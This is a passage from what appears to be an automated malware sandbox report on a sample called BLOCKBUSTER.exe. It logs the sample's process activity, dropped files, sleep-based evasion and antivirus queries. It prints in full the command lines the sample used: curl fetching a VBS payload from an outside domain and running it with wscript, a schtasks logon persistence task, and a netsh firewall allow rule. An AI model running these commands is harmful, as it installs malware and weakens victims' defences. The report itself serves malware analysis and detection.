Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: wintypes.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: appresolver.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: bcp47langs.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: slc.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: userenv.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: sppc.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: wbemcomn.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: sxs.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: napinsp.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: pnrpnsp.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: wshbth.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: nlaapi.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: mswsock.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: dnsapi.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: winrnr.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: rasadhlp.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: amsi.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: d3d10warp.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: resourcepolicyclient.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: dxcore.dll
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\wscript.exe	File created: C:\_6720c012c774c\BLOCKBUSTER.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\wscript.exe	File created: C:\_6720c012c774c\7zxa.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\wscript.exe	File created: C:\_6720c012c774c\unrar.dll			Jump to dropped file

Boot Survival

Source: C:\_6720c012c774c\BLOCKBUSTER.exe

Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "BLOCKBUSTER"

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000

Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer

Source: C:\_6720c012c774c\BLOCKBUSTER.exe

Window / User API: threadDelayed 8063

Source: C:\_6720c012c774c\BLOCKBUSTER.exe TID: 6432	Thread sleep time: -1200000s >= -30000s
Source: C:\_6720c012c774c\BLOCKBUSTER.exe TID: 6432	Thread sleep time: -1200000s >= -30000s
Source: C:\_6720c012c774c\BLOCKBUSTER.exe TID: 6432	Thread sleep time: -1200000s >= -30000s
Source: C:\_6720c012c774c\BLOCKBUSTER.exe TID: 6432	Thread sleep time: -1200000s >= -30000s
Source: C:\_6720c012c774c\BLOCKBUSTER.exe TID: 6432	Thread sleep time: -1200000s >= -30000s
Source: C:\_6720c012c774c\BLOCKBUSTER.exe TID: 6432	Thread sleep count: 8063 > 30
Source: C:\_6720c012c774c\BLOCKBUSTER.exe TID: 6432	Thread sleep time: -9675600000s >= -30000s

Source: C:\Windows\SysWOW64\wscript.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Thread delayed: delay time: 1200000

Source: C:\_6720c012c774c\BLOCKBUSTER.exe

Process information queried: ProcessInformation

Anti Debugging

Source: C:\_6720c012c774c\BLOCKBUSTER.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\wscript.exe

Network Connect: 109.234.39.156 80

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\_6720c012c774c\BLOCKBUSTER.exe "C:\_6720c012c774c\BLOCKBUSTER.exe"
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "BLOCKBUSTER"
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720c012c774c\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720c012c774c\BLOCKBUSTER.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720c012c774c\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720c012c774c\BLOCKBUSTER.exe" enable=yes profile=any

Language, Device and Operating System Detection

Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\_6720c012c774c\BLOCKBUSTER.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720c012c774c\BLOCKBUSTER.exe" enable=yes profile=any

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720c012c774c\BLOCKBUSTER.exe" enable=yes profile=any

Source: C:\_6720c012c774c\BLOCKBUSTER.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct